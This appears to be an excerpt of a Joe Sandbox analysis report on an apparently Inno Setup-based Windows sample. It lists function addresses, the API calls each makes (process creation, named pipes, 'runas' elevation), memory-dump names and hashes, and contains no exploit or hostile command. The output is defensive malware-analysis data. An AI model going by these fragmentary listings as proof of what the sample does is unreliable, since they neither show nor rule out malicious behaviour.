                                                                                                                            • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                                            • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0045092C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 734332943-0
                                                                                                                            • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                            • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                                                            • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                            • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004072A8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1611563598-0
                                                                                                                            • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                            • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                                            • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                            • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042E3EF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                            • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                                            • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                            • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004165EC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3375834691-0
                                                                                                                            • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                            • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                                            • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                            • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00448728 Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                            • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                                            • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                            • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041F3C4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                            • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                                            • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                            • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00452FC4 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1452528299-0
                                                                                                                            • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                            • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                                                            • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                            • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001004,00005007,00401973), ref: 00401766
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                            • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                                            • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                            • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406F48 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                                            • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0041F118 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                                            • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                                            • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                            • API String ID: 2323315520-3614243559
                                                                                                                            • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                            • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                                                            • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                            • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004585C8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 0045862F
                                                                                                                            • QueryPerformanceCounter.KERNEL32(021B3858,00000000,004588C2,?,?,021B3858,00000000,?,00458FBE,?,021B3858,00000000), ref: 00458638
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(021B3858,021B3858), ref: 00458642
                                                                                                                            • GetCurrentProcessId.KERNEL32(?,021B3858,00000000,004588C2,?,?,021B3858,00000000,?,00458FBE,?,021B3858,00000000), ref: 0045864B
                                                                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021B3858,021B3858), ref: 004586CF
                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                                                            • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                            • API String ID: 770386003-3271284199
                                                                                                                            • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                            • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                                            • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                            • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00478504 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                              • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                              • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                              • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021B2BF8,?,?,?,021B2BF8), ref: 004783CC
                                                                                                                              • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021B2BF8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                              • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021B2BF8,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                                                            • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                                                            • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                                            • API String ID: 883996979-221126205
                                                                                                                            • Opcode ID: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                                            • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                                                            • Opcode Fuzzy Hash: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                                            • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

